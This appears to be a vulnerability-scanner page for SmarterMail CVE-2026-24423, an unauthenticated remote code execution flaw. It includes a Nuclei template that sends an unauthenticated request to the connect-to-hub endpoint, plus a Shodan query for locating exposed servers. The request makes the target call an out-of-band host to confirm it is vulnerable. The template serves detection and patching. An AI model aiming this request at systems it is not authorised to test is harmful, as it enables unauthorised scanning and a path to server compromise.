SmarterMail - Remote Code Execution
CVE-2026-24423
Early Release
Description
SmarterTools SmarterMail before build 9511 contains an unauthenticated remote code execution vulnerability caused by OS command execution through the ConnectToHub API method, letting remote attackers execute arbitrary commands; the exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
80%
Published Date
April 10, 2026
Template Author
jyoti369
CVE-2026-24423.yaml

id: CVE-2026-24423

info:
  name: SmarterMail - Remote Code Execution
  author: jyoti369
  severity: critical
  description: |
    SmarterTools SmarterMail before build 9511 contains an unauthenticated remote code execution vulnerability caused by OS command execution through the ConnectToHub API method, letting remote attackers execute arbitrary commands; the exploit requires no authentication.
  impact: |
    Remote attackers can execute arbitrary OS commands, potentially leading to full system compromise.
  remediation: |
    Update to build 9511 or later.
  reference:
    - https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423
    - https://code-white.com/public-vulnerability-list/
    - https://www.smartertools.com/smartermail/release-notes/current
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24423
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-24423
    epss-score: 0.80272
    epss-percentile: 0.99123
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,smartermail,rce,oast,kev,vkev

http:
  - raw:
      - |
        POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"hubAddress":"http://{{interactsh-url}}","oneTimePassword":"{{randstr}}","nodeName":"{{randstr}}"}

    # Both matchers must hit: the target reached the interactsh host over HTTP,
    # and the callback it made contains the hub setup path.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "setup-initial-connection"
# digest: 4b0a00483046022100af4d4c5f4937642f95388d2136aa2f43a8335a7455431ffebf1f00b952fbd2bb022100c1c97d64f255d803246eead87b7057d1a0972a5bb69f498d089ac01446b184d2:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2026-24423
CWE ID: CWE-306
Remediation Steps
Update to build 9511 or later.